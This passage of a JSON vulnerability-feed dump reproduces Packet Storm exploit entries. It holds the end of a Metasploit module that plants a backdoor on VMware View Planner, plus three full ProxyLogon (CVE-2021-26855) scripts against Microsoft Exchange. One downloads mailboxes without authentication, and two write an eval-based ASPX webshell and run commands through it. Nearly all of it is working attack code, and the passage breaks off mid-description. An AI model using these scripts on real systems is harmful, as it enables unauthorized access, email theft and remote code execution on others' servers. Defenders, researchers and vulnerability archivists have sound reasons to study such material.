\n# with the payload we want to execute. \ndata_dir = File.join(Msf::Config.data_directory, 'exploits', shortname) \nfile_content = File.read(File.join(data_dir, 'log_upload_wsgi.py')) \n \npayload.encoded.gsub!(/\"/, '\\\\\"') \nfile_content['PAYLOAD'] = payload.encoded \n \n# Now that things are primed, upload the file to the target. \nprint_status('Uploading backdoor to system via the arbitrary file upload vulnerability!') \nupload_file(file_content) \nprint_good('Backdoor uploaded!') \n \n# Use the OPTIONS request to trigger the backdoor. Technically this \n# could be any other method including invalid ones like BACKDOOR, but for \n# the purposes of stealth lets use a legitimate one. 
\nprint_status('Sending request to execute the backdoor!') \nsend_request_cgi( \n'method' => 'OPTIONS', \n'uri' => normalize_uri(target_uri.path, 'logupload') \n) \nensure \n# At this point we should have our shell after waiting a few seconds, \n# so lets now restore the original file so we don't leave anything behind. \nprint_status('Reuploading the original code to remove the backdoor!') \nupload_file(@original_content) \nprint_good('Original file restored, enjoy the shell!') \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161879/vmware_view_planner_4_6_uploadlog_rce.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-18T15:56:31", "description": "", "cvss3": {}, "published": "2021-05-18T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange 2019 Unauthenticated Email Download", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855"], "modified": "2021-05-18T00:00:00", "id": "PACKETSTORM:162610", "href": "https://packetstormsecurity.com/files/162610/Microsoft-Exchange-2019-Unauthenticated-Email-Download.html", "sourceData": "`# Exploit Title: Microsoft Exchange 2019 - Unauthenticated Email Download \n# Date: 03-11-2021 \n# Exploit Author: Gonzalo Villegas a.k.a Cl34r \n# Vendor Homepage: https://www.microsoft.com/ \n# Version: OWA Exchange 2013 - 2019 \n# Tested on: OWA 2016 \n# CVE : CVE-2021-26855 \n# Details: checking users mailboxes and automated downloads of emails \n \nimport requests \nimport argparse \nimport time \n \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \n \n__proxies__ = {\"http\": \"http://127.0.0.1:8080\", \n\"https\": \"https://127.0.0.1:8080\"} # for debug on proxy \n \n \n# needs to specifies mailbox, will return folder Id if account exists \npayload_get_folder_id = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope 
xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:GetFolder> \n<m:FolderShape> \n<t:BaseShape>AllProperties</t:BaseShape> \n</m:FolderShape> \n<m:FolderIds> \n<t:DistinguishedFolderId Id=\"inbox\"> \n<t:Mailbox> \n<t:EmailAddress>{}</t:EmailAddress> \n</t:Mailbox> \n</t:DistinguishedFolderId> \n</m:FolderIds> \n</m:GetFolder> \n</soap:Body> \n</soap:Envelope> \n \n\"\"\" \n# needs to specifies Folder Id and ChangeKey, will return a list of messages Ids (emails) \npayload_get_items_id_folder = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<m:FindItem Traversal=\"Shallow\"> \n<m:ItemShape> \n<BaseShape>AllProperties</BaseShape></m:ItemShape> \n<SortOrder/> \n<m:ParentFolderIds> \n<t:FolderId Id=\"{}\" ChangeKey=\"{}\"/> \n</m:ParentFolderIds> \n<QueryString/> \n</m:FindItem> \n</soap:Body> \n</soap:Envelope> \n\"\"\" \n \n# needs to specifies Id (message Id) and ChangeKey (of message too), will return an email from mailbox \npayload_get_mail = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?> \n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" \nxmlns:m=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" \nxmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soap:Body> \n<GetItem xmlns=\"http://schemas.microsoft.com/exchange/services/2006/messages\" \nxmlns:t=\"http://schemas.microsoft.com/exchange/services/2006/types\" 
Traversal=\"Shallow\"> \n<ItemShape> \n<t:BaseShape>Default</t:BaseShape> \n</ItemShape> \n<ItemIds> \n<t:ItemId Id=\"{}\" ChangeKey=\"{}\"/> \n</ItemIds> \n</GetItem> \n</soap:Body> \n</soap:Envelope> \n\"\"\" \n \n \ndef getFQDN(url): \nprint(\"[*] Getting FQDN from headers\") \nrs = requests.post(url + \"/owa/auth.owa\", verify=False, data=\"evildata\") \nif \"X-FEServer\" in rs.headers: \nreturn rs.headers[\"X-FEServer\"] \nelse: \nprint(\"[-] Can't get FQDN \") \nexit(0) \n \n \ndef extractEmail(url, uri, user, fqdn, content_folderid, path): \nheaders = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn), \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": \"Mozilla pwner\"} \nfrom xml.etree import ElementTree as ET \ndom = ET.fromstring(content_folderid) \nfor p in dom.findall('.//{http://schemas.microsoft.com/exchange/services/2006/types}Folder'): \nid_folder = p[0].attrib.get(\"Id\") \nchange_key_folder = p[0].attrib.get(\"ChangeKey\") \ndata = payload_get_items_id_folder.format(id_folder, change_key_folder) \nrandom_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"] \nrs = requests.post(url + uri, data=data, headers=headers, verify=False) \nif \"ErrorAccessDenied\" in rs.text: \nprint(\"[*] Denied ;(.. 
retrying\") \nt_uri = uri.split(\"/\")[-1] \nfor ru in random_uris: \nprint(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru))) \nrs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False) \nif \"NoError\" in rs.text: \nprint(\"[+] data found, dowloading email\") \nbreak \nprint(\"[+]Getting mails...\") \ndom_messages = ET.fromstring(rs.text) \nmessages = dom_messages.find('.//{http://schemas.microsoft.com/exchange/services/2006/types}Items') \nfor m in messages: \nid_message = m[0].attrib.get(\"Id\") \nchange_key_message = m[0].attrib.get(\"ChangeKey\") \ndata = payload_get_mail.format(id_message, change_key_message) \nrandom_uris = [\"auth.js\", \"favicon.ico\", \"ssq.js\", \"ey37sj.js\"] \nrs = requests.post(url + uri, data=data, headers=headers, verify=False) \nif \"ErrorAccessDenied\" in rs.text: \nprint(\"[*] Denied ;(.. retrying\") \nt_uri = uri.split(\"/\")[-1] \nfor ru in random_uris: \nprint(\"[*] Retrying with {}\".format(uri.replace(t_uri, ru))) \nrs = requests.post(url + uri.replace(t_uri, ru), data=data, headers=headers, verify=False) \nif \"NoError\" in rs.text: \nprint(\"[+] data found, downloading email\") \nbreak \n \ntry: \nf = open(path + \"/\" + user.replace(\"@\", \"_\").replace(\".\", \"_\")+\"_\"+change_key_message.replace(\"/\", \"\").replace(\"\\\\\", \"\")+\".xml\", 'w+') \nf.write(rs.text) \nf.close() \nexcept Exception as e: \nprint(\"[!] 
Can't write .xml file to path (email): \", e) \n \n \ndef checkURI(url, fqdn): \nheaders = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn), \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": \"Mozilla hehe\"} \narr_uri = [\"//ecp/xxx.js\", \"/ecp/favicon.ico\", \"/ecp/auth.js\"] \nfor uri in arr_uri: \nrs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(\"thisisnotanvalidmail@pwn.local\"), \nheaders=headers) \n#print(rs.content) \nif rs.status_code == 200 and \"MessageText\" in rs.text: \nprint(\"[+] Valid URI:\", uri) \ncalculated_domain = rs.headers[\"X-CalculatedBETarget\"].split(\".\") \nif calculated_domain[-2] in (\"com\", \"gov\", \"gob\", \"edu\", \"org\"): \ncalculated_domain = calculated_domain[-3] + \".\" + calculated_domain[-2] + \".\" + calculated_domain[-1] \nelse: \ncalculated_domain = calculated_domain[-2] + \".\" + calculated_domain[-1] \nreturn uri, calculated_domain \n#time.sleep(1) \nprint(\"[-] No valid URI found ;(\") \nexit(0) \n \n \ndef checkEmailBoxes(url, uri, user, fqdn, path): \nheaders = {\"Cookie\": \"X-BEResource={}/EWS/Exchange.asmx?a=~1942062522\".format(fqdn), \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": \"Mozilla hehe\"} \nrs = requests.post(url + uri, verify=False, data=payload_get_folder_id.format(user), \nheaders=headers) \n#time.sleep(1) \n#print(rs.content) \nif \"ResponseCode\" in rs.text and \"ErrorAccessDenied\" in rs.text: \nprint(\"[*] Valid Email: {} ...but not authenticated ;( maybe not vulnerable\".format(user)) \nif \"ResponseCode\" in rs.text and \"NoError\" in rs.text: \nprint(\"[+] Valid Email Found!: {}\".format(user)) \nextractEmail(url, uri, user, fqdn, rs.text, path) \nif \"ResponseCode\" in rs.text and \"ErrorNonExistentMailbox\" in rs.text: \nprint(\"[-] Not Valid Email: {}\".format(user)) \n \n \ndef main(): \n__URL__ = None \n__FQDN__ = None \n__mailbox_domain__ = None \n__path__ = None \nprint(\"[***** OhhWAA *****]\") \nparser = 
argparse.ArgumentParser(usage=\"Basic usage python %(prog)s -u <url> -l <users.txt> -p <path>\") \nparser.add_argument('-u', \"--url\", help=\"Url, provide schema and not final / (eg https://example.org)\", required=True) \nparser.add_argument('-l', \"--list\", help=\"Users mailbox list\", required=True) \nparser.add_argument(\"-p\", \"--path\", help=\"Path to write emails in xml format\", required=True) \nparser.add_argument('-f', \"--fqdn\", help=\"FQDN\", required=False, default=None) \nparser.add_argument(\"-d\", \"--domain\", help=\"Domain to check mailboxes (eg if .local dont work)\", required=False, default=None) \nargs = parser.parse_args() \n__URL__ = args.url \n__FQDN__ = args.fqdn \n__mailbox_domain__ = args.domain \n__list_users__ = args.list \n__valid_users__ = [] \n__path__ = args.path \nif not __FQDN__: \n__FQDN__ = getFQDN(__URL__) \nprint(\"[+] Got FQDN:\", __FQDN__) \n \nvalid_uri, calculated_domain = checkURI(__URL__, __FQDN__) \n \nif not __mailbox_domain__: \n__mailbox_domain__ = calculated_domain \n \nlist_users = open(__list_users__, \"r\") \nfor user in list_users: \ncheckEmailBoxes(__URL__, valid_uri, user.strip()+\"@\"+__mailbox_domain__, __FQDN__, __path__) \n \nprint(\"[!!!] 
FINISHED OhhWAA\") \n \n \nif __name__ == '__main__': \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162610/msexchange2019-disclose.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:17:14", "description": "", "cvss3": {}, "published": "2021-03-18T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange 2019 SSRF / Arbitrary File Write ", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-18T00:00:00", "id": "PACKETSTORM:161846", "href": "https://packetstormsecurity.com/files/161846/Microsoft-Exchange-2019-SSRF-Arbitrary-File-Write.html", "sourceData": "`import requests \nfrom urllib3.exceptions import InsecureRequestWarning \nimport random \nimport string \nimport sys \n \n \ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits): \nreturn ''.join(random.choice(chars) for _ in range(size)) \n \nif len(sys.argv) < 2: \nprint(\"\u4f7f\u7528\u65b9\u5f0f: python PoC.py <target> <email>\") \nprint(\"\u4f7f\u7528\u65b9\u5f0f: python PoC.py mail.btwaf.cn test2@btwaf.cn\") \nexit() \n \nproxies = {\"http\": \"http://127.0.0.1:8080\", \"https\": \"http://127.0.0.1:8080\"} \nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) \ntarget = sys.argv[1] \nemail = sys.argv[2] \nrandom_name = id_generator(4) + \".js\" \nuser_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\" \n \nshell_path = \"Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\test11.aspx\" \nshell_absolute_path = \"\\\\\\\\127.0.0.1\\\\c$\\\\%s\" % shell_path \n \n# webshell - trojan content \nshell_content = '<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"code\"],\"unsafe\");}</script>' \n \nautoDiscoverBody = \"\"\"<Autodiscover 
xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \n\"\"\" % email \n \nprint(\"\u6b63\u5728\u83b7\u53d6Exchange Server \" + target+\"\u6743\u9650\") \nprint(\"=============================\") \nFQDN = \"EXCHANGE01\" \nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\"Cookie\": \"X-BEResource=localhost~1942062522\", \n\"User-Agent\": user_agent}, \nverify=False,proxies=proxies) \n \nif \"X-CalculatedBETarget\" in ct.headers and \"X-FEServer\" in ct.headers: \nFQDN = ct.headers[\"X-FEServer\"] \n \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": user_agent}, \ndata=autoDiscoverBody, \nproxies=proxies, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(ct.status_code) \nprint(\"Autodiscover Error!\") \nexit() \n \nif \"<LegacyDN>\" not in str(ct.content): \nprint(\"Can not get LegacyDN!\") \nexit() \n \nlegacyDn = str(ct.content).split(\"<LegacyDN>\")[1].split(r\"</LegacyDN>\")[0] \nprint(\"Got DN: \" + legacyDn) \n \nmapi_body = legacyDn + \"\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;\" % FQDN, \n\"Content-Type\": \"application/mapi-http\", \n\"X-Requesttype\": \"Connect\", \n\"X-Clientinfo\": \"{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}\", \n\"X-Clientapplication\": \"Outlook/15.0.4815.1002\", \n\"X-Requestid\": 
\"{E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456\", \n\"User-Agent\": user_agent \n}, \ndata=mapi_body, \nverify=False, \nproxies=proxies \n) \nif ct.status_code != 200 or \"act as owner of a UserMailbox\" not in str(ct.content): \nprint(\"Mapi Error!\") \nexit() \n \nsid = str(ct.content).split(\"with SID \")[1].split(\" and MasterAccountSid\")[0] \n \nprint(\"Got SID: \" + sid) \nsid = sid.replace(sid.split(\"-\")[-1],\"500\") \n \nproxyLogon_request = \"\"\"<r at=\"Negotiate\" ln=\"john\"><s>%s</s><s a=\"7\" t=\"1\">S-1-1-0</s><s a=\"7\" t=\"1\">S-1-5-2</s><s a=\"7\" t=\"1\">S-1-5-11</s><s a=\"7\" t=\"1\">S-1-5-15</s><s a=\"3221225479\" t=\"1\">S-1-5-5-0-6948923</s></r> \n\"\"\" % sid \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/proxyLogon.ecp?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"User-Agent\": user_agent \n}, \ndata=proxyLogon_request, \nproxies=proxies, \nverify=False \n) \nif ct.status_code != 241 or not \"set-cookie\" in ct.headers: \nprint(\"Proxylogon Error!\") \nexit() \n \nsess_id = ct.headers['set-cookie'].split(\"ASP.NET_SessionId=\")[1].split(\";\")[0] \n \nmsExchEcpCanary = ct.headers['set-cookie'].split(\"msExchEcpCanary=\")[1].split(\";\")[0] \nprint(\"Got session id: \" + sess_id) \nprint(\"Got canary: \" + msExchEcpCanary) \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; \", \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"User-Agent\": user_agent \n \n}, \njson={\"filter\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", 
\n\"SelectedView\": \"\", \"SelectedVDirType\": \"All\"}}, \"sort\": {}}, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(\"GetOAB Error!\") \nexit() \noabId = str(ct.content).split('\"RawIdentity\":\"')[1].split('\"')[0] \nprint(\"Got OAB id: \" + oabId) \n \noab_json = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"ExternalUrl\": \"http://ffff/#%s\" % shell_content}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=oab_json, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Set external url Error!\") \nexit() \n \nreset_oab_body = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"FilePathName\": shell_absolute_path}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Administrator@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"msExchLogonMailbox\": \"S-1-5-20\", \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=reset_oab_body, \nverify=False \n) \n \nif ct.status_code != 200: 
\nprint(\"\u5199\u5165shell\u5931\u8d25\u4e86\u554a\") \nexit() \n \nprint(\"\u6210\u529f\u4e86\u3002\u9a6c\u4e0a\u5c31\u9a8c\u8bc1shell\u662f\u5426OK!\") \nprint(\"POST shell:https://\"+target+\"/owa/auth/test11.aspx\") \nshell_url=\"https://\"+target+\"/owa/auth/test11.aspx\" \nprint('code=Response.Write(new ActiveXObject(\"WScript.Shell\").exec(\"whoami\").StdOut.ReadAll());') \nprint(\"\u6b63\u5728\u8bf7\u6c42shell\") \ndata=requests.post(shell_url,data={\"code\":\"Response.Write(new ActiveXObject(\\\"WScript.Shell\\\").exec(\\\"whoami\\\").StdOut.ReadAll());\"},verify=False) \nif data.status_code != 200: \nprint(\"\u5199\u5165shell\u5931\u8d25\") \nelse: \nprint(\"\u6743\u9650\u5982\u4e0b\uff1a\"+data.text.split(\"OAB (Default Web Site)\")[0].replace(\"Name : \",\"\")) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161846/msexchange2019-ssrfexec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-15T21:46:57", "description": "", "cvss3": {}, "published": "2021-03-11T00:00:00", "type": "packetstorm", "title": "Microsoft Exchange Proxylogon SSRF Proof Of Concept", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-11T00:00:00", "id": "PACKETSTORM:161806", "href": "https://packetstormsecurity.com/files/161806/Microsoft-Exchange-Proxylogon-SSRF-Proof-Of-Concept.html", "sourceData": "`# Original Author: testanull https://github.com/testanull https://twitter.com/testanull \n# PoC of proxylogon chain SSRF(CVE-2021-26855) to write file \n# Original \"Archive\" https://web.archive.org/web/20210310164403/https://gist.github.com/testanull/fabd8eeb46f120c4b15f8793617ca7d1 \n \nimport requests \nfrom urllib3.exceptions import InsecureRequestWarning \nimport random \nimport string \nimport sys \n \n \ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits): \nreturn ''.join(random.choice(chars) for _ in range(size)) \n \nif len(sys.argv) < 2: 
\nprint(\"Usage: python PoC.py <target> <email>\") \nprint(\"Example: python PoC.py mail.evil.corp haxor@evil.corp\") \nexit() \nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) \ntarget = sys.argv[1] \nemail = sys.argv[2] \nrandom_name = id_generator(3) + \".js\" \nuser_agent = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36\" \n \nshell_path = \"Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\ahihi.aspx\" \nshell_absolute_path = \"\\\\\\\\127.0.0.1\\\\c$\\\\%s\" % shell_path \n \nshell_content = '<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"exec_code\"],\"unsafe\");}</script>' \nlegacyDnPatchByte = \"68747470733a2f2f696d6775722e636f6d2f612f7a54646e5378670a0a0a0a0a0a0a0a\" \nautoDiscoverBody = \"\"\"<Autodiscover xmlns=\"http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006\"> \n<Request> \n<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema> \n</Request> \n</Autodiscover> \n\"\"\" % email \n \nprint(\"Attacking target \" + target) \nprint(\"=============================\") \nprint(legacyDnPatchByte.decode('hex')) \nFQDN = \"EXCHANGE\" \nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={\"Cookie\": \"X-BEResource=localhost~1942062522\", \n\"User-Agent\": user_agent}, \nverify=False) \nif \"X-CalculatedBETarget\" in ct.headers and \"X-FEServer\" in ct.headers: \nFQDN = ct.headers[\"X-FEServer\"] \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": user_agent}, \ndata=autoDiscoverBody, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Autodiscover 
Error!\") \nexit() \nif \"<LegacyDN>\" not in ct.content: \nprint(\"Can not get LegacyDN!\") \nexit() \n \nlegacyDn = ct.content.split(\"<LegacyDN>\")[1].split(\"</LegacyDN>\")[0] \nprint(\"Got DN: \" + legacyDn) \n \nmapi_body = legacyDn + \"\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x09\\x04\\x00\\x00\\x00\\x00\\x00\\x00\" \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;\" % FQDN, \n\"Content-Type\": \"application/mapi-http\", \n\"User-Agent\": user_agent \n}, \ndata=mapi_body, \nverify=False \n) \nif ct.status_code != 200 or \"act as owner of a UserMailbox\" not in ct.content: \nprint(\"Mapi Error!\") \nexit() \n \nsid = ct.content.split(\"with SID \")[1].split(\" and MasterAccountSid\")[0] \n \nprint(\"Got SID: \" + sid) \n \nproxyLogon_request = \"\"\"<r at=\"Negotiate\" ln=\"john\"><s>%s</s><s a=\"7\" t=\"1\">S-1-1-0</s><s a=\"7\" t=\"1\">S-1-5-2</s><s a=\"7\" t=\"1\">S-1-5-11</s><s a=\"7\" t=\"1\">S-1-5-15</s><s a=\"3221225479\" t=\"1\">S-1-5-5-0-6948923</s></r> \n\"\"\" % sid \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/proxyLogon.ecp?a=~1942062522;\" % FQDN, \n\"Content-Type\": \"text/xml\", \n\"User-Agent\": user_agent \n}, \ndata=proxyLogon_request, \nverify=False \n) \nif ct.status_code != 241 or not \"set-cookie\" in ct.headers: \nprint(\"Proxylogon Error!\") \nexit() \n \nsess_id = ct.headers['set-cookie'].split(\"ASP.NET_SessionId=\")[1].split(\";\")[0] \n \nmsExchEcpCanary = ct.headers['set-cookie'].split(\"msExchEcpCanary=\")[1].split(\";\")[0] \nprint(\"Got session id: \" + sess_id) \nprint(\"Got canary: \" + msExchEcpCanary) \n \nct = requests.get(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/about.aspx?a=~1942062522; 
ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, sess_id, msExchEcpCanary), \n\"User-Agent\": user_agent \n}, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"Wrong canary!\") \nprint(\"Sometime we can skip this ...\") \nrbacRole = ct.content.split(\"RBAC roles:</span> <span class='diagTxt'>\")[1].split(\"</span>\")[0] \n# print \"Got rbacRole: \"+ rbacRole \n \nprint(\"=========== It means good to go!!!====\") \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n \n}, \njson={\"filter\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"SelectedView\": \"\", \"SelectedVDirType\": \"All\"}}, \"sort\": {}}, \nverify=False \n) \nif ct.status_code != 200: \nprint(\"GetOAB Error!\") \nexit() \noabId = ct.content.split('\"RawIdentity\":\"')[1].split('\"')[0] \nprint(\"Got OAB id: \" + oabId) \n \noab_json = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"ExternalUrl\": \"http://ffff/#%s\" % shell_content}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=oab_json, \nverify=False \n) \nif ct.status_code 
!= 200: \nprint(\"Set external url Error!\") \nexit() \n \nreset_oab_body = {\"identity\": {\"__type\": \"Identity:ECP\", \"DisplayName\": \"OAB (Default Web Site)\", \"RawIdentity\": oabId}, \n\"properties\": { \n\"Parameters\": {\"__type\": \"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel\", \n\"FilePathName\": shell_absolute_path}}} \n \nct = requests.post(\"https://%s/ecp/%s\" % (target, random_name), headers={ \n\"Cookie\": \"X-BEResource=Admin@%s:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=%s&a=~1942062522; ASP.NET_SessionId=%s; msExchEcpCanary=%s\" % ( \nFQDN, msExchEcpCanary, sess_id, msExchEcpCanary), \n\"Content-Type\": \"application/json; charset=utf-8\", \n\"User-Agent\": user_agent \n}, \njson=reset_oab_body, \nverify=False \n) \n \nif ct.status_code != 200: \nprint(\"Write Shell Error!\") \nexit() \n \nprint(\"Successful!\") \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/161806/PoC_proxyLogon.py.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-08-17T10:43:41", "description": "This module exploit a vulnerability on Microsoft Exchange Server that allows an attacker bypassing the 